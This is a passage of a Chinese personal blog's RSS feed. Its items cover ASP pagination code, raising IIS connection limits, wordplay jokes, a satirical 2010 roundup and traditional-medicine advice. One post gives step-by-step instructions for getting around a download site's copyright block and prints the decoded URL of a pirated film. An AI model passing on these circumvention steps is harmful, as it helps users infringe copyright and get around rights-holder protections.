href="http://www.xesee.com/catalog.asp?tags=%E9%98%B2%E6%B3%A8%E5%85%A5%E4%BB%A3%E7%A0%81">防注入代码</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=asp">asp</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=asp%2Enet">asp.net</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=PHP">PHP</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=%E5%AE%89%E5%85%A8">安全</a>&nbsp;&nbsp; | <a href="http://www.xesee.com/post/防注入代码.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><li><a href="http://www.xesee.com/post/ajax分页.html">ASP无刷新AJAX分页源代码</a> (2011-3-11 17:41:47)  </li><li><a href="http://www.xesee.com/post/417.html">ASP技巧之FSO组件（代码大全）</a> (2010-11-10 17:59:26)  </li><li><a href="http://www.xesee.com/post/shengchengjingtai.html">生成静态组件</a> (2008-3-12 17:14:15)  </li><li><a href="http://www.xesee.com/post/aspshengchengxml.html">用asp生成xml的文件头</a> (2008-3-11 17:7:20)  </li><li><a href="http://www.xesee.com/post/php_suijihanshu.html">PHP生成随机数</a> (2008-3-4 16:57:41)  </li></ul>]]></description><category>电脑专业</category><comments>http://www.xesee.com/post/防注入代码.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=430</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=430&amp;key=e1af1e56</trackback:ping></item><item><title>ASP无刷新AJAX分页源代码</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/ajax分页.html</link><pubDate>Fri, 11 Mar 2011 17:41:47 +0800</pubDate><guid>http://www.xesee.com/post/ajax分页.html</guid><description><![CDATA[网上的代码，大家可以试试哦：<br/><p class="code"><code>&lt;%<br/>@enablesessionstate=false<br/>@LANGUAGE="VBSCRIPT"&nbsp;CODEPAGE="65001"<br/>%&gt;<br/>&lt;!--#include&nbsp;file="conn.asp"--&gt;<br/>&lt;%<br/>response.buffer=true<br/>response.expires=-1<br/>response.contenttype="text/xml"<br/>response.write"&lt;?xml&nbsp;version='1.0'&nbsp;encoding='gb2312'?&gt;&lt;aa&gt;"<br/><br/>set&nbsp;conn=new&nbsp;use_mdb<br/><br/>conn.fenye&nbsp;"select&nbsp;count(*)&nbsp;as&nbsp;a&nbsp;from&nbsp;aa",5,"select&nbsp;aa,bb&nbsp;from&nbsp;aa"<br/><br/>conn.end_conn<br/><br/>response.write"&lt;/aa&gt;"<br/>%&gt;<br/></code></p>AJAX分页源代码下载：<br/><a href="http://www.xesee.com/upload/201103111742471146.rar" target="_blank">201103111742471146.rar</a><p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/ajax分页.html" target="_blank">继续阅读《ASP无刷新AJAX分页源代码》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/computer.html">电脑专业</a> | Tags: <a href="http://www.xesee.com/catalog.asp?tags=asp">asp</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=%E6%97%A0%E5%88%B7%E6%96%B0%E6%8A%80%E6%9C%AF">无刷新技术</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=AJAX%E5%88%86%E9%A1%B5%E6%BA%90%E4%BB%A3%E7%A0%81">AJAX分页源代码</a>&nbsp;&nbsp; | <a href="http://www.xesee.com/post/ajax分页.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><li><a href="http://www.xesee.com/post/防注入代码.html">防注入代码（ASP/ASP.NET/PHP三种代码）</a> (2011-4-8 22:31:0)  </li><li><a href="http://www.xesee.com/post/417.html">ASP技巧之FSO组件（代码大全）</a> (2010-11-10 17:59:26)  </li><li><a href="http://www.xesee.com/post/shengchengjingtai.html">生成静态组件</a> (2008-3-12 17:14:15)  </li><li><a href="http://www.xesee.com/post/aspshengchengxml.html">用asp生成xml的文件头</a> (2008-3-11 17:7:20)  </li></ul>]]></description><category>电脑专业</category><comments>http://www.xesee.com/post/ajax分页.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=429</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=429&amp;key=dad681b8</trackback:ping></item><item><title>修改XP/2000/2003的IIS默认连接数</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/428.html</link><pubDate>Fri, 28 Jan 2011 09:49:54 +0800</pubDate><guid>http://www.xesee.com/post/428.html</guid><description><![CDATA[Microsoft提供了一个管理IIS的小工具MetaEdit，MetaEdit工作在WindowsNT4.0、Windows2000上，我发现它在WindowsXP上也能正常工作，另外，MetaEdit只能管理II4.0、IIS5.0或更高版本的IIS。<br/>　　下面利用这个工具突破WindowsXP专业版IIS客户端连接限制：<br/><br/>　　首先，你需要到下面的地址下载MetaEdit，最新版本是2.2。<br/><a href="http://sh.itxiazai.com/soft/system/syssetup/IT_MtaEdt22.zip"  target="_blank">http://sh.itxiazai.com/soft/system/syssetup/IT_MtaEdt22.zip</a><br/>　　(如果是WINXP+SP2，请下载：SP2限制连接数补丁最新版本2.11a并查看文末说明)<br/><br/>　　然后，执行MtaEdt22.exe按向导提示完成MetaEdit安装。<br/><br/>　　最后，在MetaEdit中设置客户端连接限制的参数。<br/><br/>　　安装MetaEdit完毕后，在开始菜单的程序组AdministrativeTools下点击MetaEdit2.2运行，出现窗口：<br/><br/>　　在窗口的左边将树展开至LM\\W3SVC，直接在W3SVC文件夹上单击，选择右边列表中Name为MaxConnections的项，双击后，出现对话框：<br/><br/>　　在最后Data的文本框中默认的是10，这就是WindowsXP专业版IIS<br/><br/>　　默认设置的最大客户端连接数了，现在你可以改变这个默认值了，我把它改为99999，<br/><br/>　　注意：在Win2000上的IIS客户端连接数最大为2000000000<br/><br/><p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/428.html" target="_blank">继续阅读《修改XP/2000/2003的IIS默认连接数》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/computer.html">电脑专业</a> | Tags:  | <a href="http://www.xesee.com/post/428.html#comment" target="_blank">添加评论</a>(0)</p><p><a href="http://www.xesee.com/post/428.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>电脑专业</category><comments>http://www.xesee.com/post/428.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=428</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=428&amp;key=ff8d1472</trackback:ping></item><item><title>中国式英语，让你 smilence and emotionormal</title><author>admin@zesee.com (zesee)</author><link>http://www.xesee.com/post/427.html</link><pubDate>Mon, 03 Jan 2011 10:30:46 +0800</pubDate><guid>http://www.xesee.com/post/427.html</guid><description><![CDATA[<p>smilence=smile+silence=笑而不语</p><p>emotionormal=emotion+normal=情绪稳定</p><p>sexretary=sex+secretary=女秘书</p><p>togayther=together+gay=终成眷属</p><p>jokarlist=joke+journalist=记者</p><p>Innernet=inner + internet=互联网</p><p>&nbsp;</p><p>circusee=circus+see=围观</p><p>vegeteal=vegetable+steal=偷菜</p><p>chinsumer=Chinese+consumer=在国外疯狂购物的中国人</p><p>suihide=suicide+hide=躲猫猫</p><p>don&rsquo;train=don&rsquo;t+train=动车</p><p>shitizen=shit+citizen=屁民</p><p>divoice=divorce+voice=离婚宣言</p><p>animale=animal+male=男人天性</p><p>Democrazy=democracy + crazy=痴心妄想</p><p>Freedamn=freedom + damn=自由</p><p>Amerryca=america + merry=享乐国</p><p>canclensor=censor + cancel=审查</p><p>yakshit=亚克西</p><p>carass=轻拂菊花</p><p>harmany=harmony + any=河蟹</p><p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/427.html" target="_blank">继续阅读《中国式英语，让你 smilence and emotionormal》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/other.html">七七八八</a> | Tags:  | <a href="http://www.xesee.com/post/427.html#comment" target="_blank">添加评论</a>(0)</p><p><a href="http://www.xesee.com/post/427.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>七七八八</category><comments>http://www.xesee.com/post/427.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=427</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=427&amp;key=375bfdf9</trackback:ping></item><item><title>2010的超牛总结</title><author>admin@zesee.com (zesee)</author><link>http://www.xesee.com/post/426.html</link><pubDate>Mon, 03 Jan 2011 10:21:41 +0800</pubDate><guid>http://www.xesee.com/post/426.html</guid><description><![CDATA[<p>2010，有一种美女叫&ldquo;凤姐&rdquo;，有一种帅哥叫&ldquo;犀利哥&rdquo;，有一种女朋友叫&ldquo;小月月&rdquo;，有一种爸爸叫&ldquo;李刚&rdquo;......<br />2010，有一个新词叫&ldquo;给力&rdquo;，有一个群族叫&ldquo;爱疯&rdquo;，有一名中医喜欢绿豆和茄子，有一位道长会水下闭气......<br />2010，有一种节能减排叫&ldquo;拉闸限电&rdquo;，有一种足球协会叫&ldquo;足囚协会&rdquo;，有一种慈善叫&ldquo;裸捐&rdquo;，有一种房地产调控叫&ldquo;空调&rdquo;......<br />2010，有一种住宅叫&ldquo;蛋屋&rdquo;，有一种理财叫&ldquo;群租&rdquo;，有一种集装箱叫&ldquo;蜗居&rdquo;，有一种别墅叫&ldquo;经适房&rdquo;......<br />2010，吃小龙虾可能肌溶解，送孩子上学时可能被拆房，盖被子可能会被闷死，赶不上火车可能白买票......<br />2010，很多&ldquo;大牌&rdquo;都不淡定，郭德纲称徒弟&ldquo;民族英雄&rdquo;被反三俗，周立波嘲弄网络舆情获封&ldquo;周自宫&rdquo;，连腾讯都被360&ldquo;逼&rdquo;出了一个&ldquo;艰难的决定&rdquo;......<br />2010，爱写日记的不光有雷锋，还有韩峰，大美女不光天上有，天上人间也有......</p><p>他们的发现---</p><p>2010，想买房的人发现，&ldquo;国十条&rdquo;猛烈的来了，却没有带走一片云彩。房产调控年年高高举起，年年轻轻放下，年年政策给力，年年执行不力。哎。不是狼来了，而是狼都来腻了。<br />2010，剩男剩女们发现，其实找对象不用去江苏卫视的《非诚勿扰》，更不用去山东卫视的《爱情来敲门》，只要去上海世博会排几小时队就行，患难之中见真情。<br />2010，创业者们发现，原来蒙牛董事长牛根生的&ldquo;小胜靠智，大胜靠德&rdquo;不靠谱，小胜是要靠智，但大胜得缺德。<br />2010，唐骏发现，英雄也要问出处，一个人，不论多么辉煌过，一个不小心，就有被集体的口水迅速淹没的那天。<br />2010，一些精英们发现，他们迷信的李一，其实不是神仙，只是很清楚他们的病根--他们已经成为权力、资本、色欲的奴隶，无法在欣赏到自然的美。<br />2010，媒体发现，电影《山楂树》玩了把纯情，于是揶揄道：世道这么乱，装纯给谁看？其实在乱世，人们更需要纯情的东西。不管环境多么残酷，留给自己一个纯情的时间，一个纯情的对象，日子就过来了。</p><p>2010大家的发现：<br />A：我发现，以前该省钱的时候我一分钱没省下来；现在真的省下来了，钱又不值钱了。<br />B: 我发现我找个合适的工作很难，但是，找个合适的对象比找个合适的工作还要难！<br />C：我发现我女朋友开始催我抓紧时间买房子了，吃饺子也不给我拌蒜泥了。<br />D：我发现100元越来越像10元了。<br />E：发现&ldquo;国考&rdquo;越来越热了，考上的概率越来越小了，发现考研的越来越多了但含金量越来越低了，发现学校毕业就业率越来越高了，但薪水&ldquo;低破&rdquo;一千了。还发现。我长白头发了......<br />F：发现懂了这句话：他不爱你，不是你不够好，而是你无论怎样，都不好。<br />G：发现身边的楼房阳台都变成菜园了。</p><p>2010的悲喜：<br />1.长得帅有什么用？考清华有什么用？学经济有什么用？将来还不是要娶罗玉凤！<br />2.新闻联播的牛叉之处在于就算你一直在换台，也能完整的看完一条新闻。<br />3.现在的人穿衣服不是为了保暖，而是为了关键时刻有衣服可脱；现在的人同居不是为了结婚，而是为了不用结婚。<br />4.人类社会发展有很多问题，但归根到底只有三个：长相问题、纯洁问题和人品问题。任何不解的事情，包括《十万个为什么》里面找不到答案的，都可以在这三大问题中找到答案。</p><p>结语：做自己的事，活自己的命。因为，神马都是浮云 , 快乐才最重要！</p><p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/426.html" target="_blank">继续阅读《2010的超牛总结》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/other.html">七七八八</a> | Tags: <a href="http://www.xesee.com/catalog.asp?tags=2010">2010</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=%E6%80%BB%E7%BB%93">总结</a>&nbsp;&nbsp; | <a href="http://www.xesee.com/post/426.html#comment" target="_blank">添加评论</a>(0)</p><p><a href="http://www.xesee.com/post/426.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>七七八八</category><comments>http://www.xesee.com/post/426.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=426</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=426&amp;key=45b5ebd4</trackback:ping></item><item><title>《大笑江湖》高清DVD迅雷下载</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/425.html</link><pubDate>Tue, 21 Dec 2010 20:40:05 +0800</pubDate><guid>http://www.xesee.com/post/425.html</guid><description><![CDATA[近期热播的《大笑江湖》一上映出来就引来一阵收视狂潮。由于近期没有心思去电影院一睹为快。就上狗狗上搜索资源，无奈看到这样的提示：<br/><p class="code"><code>来源：该资源为版权方声明保护内容，狗狗已屏蔽其下载。</code></p>而下载按钮，也变成了灰色，为无法点击的状态。<br/>细心的网友应该会发现，在刚打开的那一瞬间下载按钮是可点击的状态。那么，我们不难推测出页面中应该是有下载地址的，而在加载完页面后，下载按钮是被JS所禁用的。<br/>查看了页面代码后（出现N多次的liaomq..晕），我们就可以飞快的理出思路。<br/><br/>破解迅雷下载的地址大法：<br/>1、找到代码，并复制：<br/><p class="code"><code>var&nbsp;g_downUrlList=["%68%74%74%70%3a%2f%2f%62%61%6b%2e%68%6f%74%39%2e%31%31%35%63%64%6e%2e%63%6f%6d%2f%70%69%63%6b%64%6f%77%6e%2f%31%65%64%32%33%63%65%39%38%65%66%31%30%61%33%38%65%36%63%33%39%33%32%64%65%63%66%36%64%64%62%63%34%64%30%32%34%37%36%64%2f%4d%30%30%2f%30%31%2f%37%37%2f%64%35%4e%71%33%45%30%42%35%53%45%41%41%41%41%41%4b%39%4f%4d%61%6b%38%34%70%66%6b%30%38%34%30%31%32%35%2f%25%35%42%25%45%37%25%39%34%25%42%35%25%45%35%25%42%44%25%42%31%25%45%34%25%42%38%25%38%42%25%45%38%25%42%44%25%42%44%25%45%35%25%42%30%25%42%31%25%45%34%25%42%38%25%38%41%57%57%57%2e%56%45%52%59%50%53%50%2e%43%4f%4d%25%35%44%64%78%6a%68%2e%61%76%69%3f%66%69%6c%65%3d%25%35%42%25%45%37%25%39%34%25%42%35%25%45%35%25%42%44%25%42%31%25%45%34%25%42%38%25%38%42%25%45%38%25%42%44%25%42%44%25%45%35%25%42"];<br/>var&nbsp;g_downUrl&nbsp;=&nbsp;decodeURIComponent(g_downUrlList[0]);</code></p>2、新建文本文件将其更名为“url.html”，输入如下代码：<br/><p class="code"><code>&lt;script&gt;<br/>//上面的代码开始<br/><br/>//上面的代码结束<br/>document.write(g_downUrl);<br/>&lt;/script&gt;</code></p>保存，并打开该文件，就可看到<b>大笑江湖</b>的下载地址，应该为：<br/><p class="code"><code>http://bak.hot9.115cdn.com/pickdown/1ed23ce98ef10a38e6c3932decf6ddbc4d02476d/M00/01/77/d5Nq3E0B5SEAAAAAK9OMak84pfk0840125/%5B%E7%94%B5%E5%BD%B1%E4%B8%8B%E8%BD%BD%E5%B0%B1%E4%B8%8AWWW.VERYPSP.COM%5Ddxjh.avi?file=%5B%E7%94%B5%E5%BD%B1%E4%B8%8B%E8%BD%BD%E5%B</code></p><br/>本方法仅作学习之用。不要用于商业用途！郑重声明，由此引起的任何责任与本人无关！<br/><br/><img onload="ResizeImage(this,728)" src="http://www.xesee.com/upload/201012212051248323.JPG" alt="" title=""/><p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/425.html" target="_blank">继续阅读《《大笑江湖》高清DVD迅雷下载》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/computer.html">电脑专业</a> | Tags: <a href="http://www.xesee.com/catalog.asp?tags=%E5%A4%A7%E7%AC%91%E6%B1%9F%E6%B9%96">大笑江湖</a>&nbsp;&nbsp; | <a href="http://www.xesee.com/post/425.html#comment" target="_blank">添加评论</a>(0)</p><p><a href="http://www.xesee.com/post/425.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>电脑专业</category><comments>http://www.xesee.com/post/425.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=425</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=425&amp;key=4f9d41a6</trackback:ping></item><item><title>平和质</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/424.html</link><pubDate>Tue, 21 Dec 2010 17:05:03 +0800</pubDate><guid>http://www.xesee.com/post/424.html</guid><description><![CDATA[<b>平和质，是什么意思？</b> <br/>- 令人羡慕，只占中国人群的30%左右。 <br/>- 先天禀赋良好，后天调养得当。 <br/>- 体态适中，面色红润，精力充沛，脏腑功能强健壮实。 <br/>- 是一个和谐生命的范本。 <br/><br/><br/><b>平和质还有这些优点</b> <br/>- 体型匀称，通常不会太高大，体重适中，波动不大。 <br/>- 食欲稳定，饮食规律。 <br/>- 情绪平稳，性格平和，容易开心，好相处。 <br/>- 代谢畅通。通常汗出畅通或在天热、热食、热饮、洗澡、运动情况下汗出比别人更多些，而且 觉得舒服。 <br/>- 皮肤光洁，面色红润。<br/><br/><b>平和质怎么来？ </b><br/>- 出生于长寿家庭。 <br/>- 父母善于养生。回归简单，自然而然。从小就有良好的生活习惯和性格心态。 <br/>- 保持了良好的生活习惯，饮食健康，起居有常。 <br/>- 顺应四季的自然特点饮食穿衣。 <br/>- 几乎不熬夜。 <br/>- 懂得知足，遇烦心事先反省、不抱怨。 <br/>- 适度运动，不以追求肌肉为目标。 <br/><br/><b>也许你不是真平和质！</b> <br/>- 别高兴太早，低头看看你的肚子！这大肚腩是健康定时炸弹。 <br/>- 脸色不如年轻时候有光泽，精力也许不是那么充沛。 <br/>- 如果你的实际情况并不符合关于平和质的描述，或者有一些异常的体检指标。请注意你的生活 方式吧。你处在平和与偏颇的边缘。<br/><br/><p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/424.html" target="_blank">继续阅读《平和质》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/other.html">七七八八</a> | Tags: <a href="http://www.xesee.com/catalog.asp?tags=%E5%B9%B3%E5%92%8C%E8%B4%A8">平和质</a>&nbsp;&nbsp; | <a href="http://www.xesee.com/post/424.html#comment" target="_blank">添加评论</a>(0)</p><p><a href="http://www.xesee.com/post/424.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>七七八八</category><comments>http://www.xesee.com/post/424.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=424</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=424&amp;key=9e2c8df0</trackback:ping></item></channel></rss>

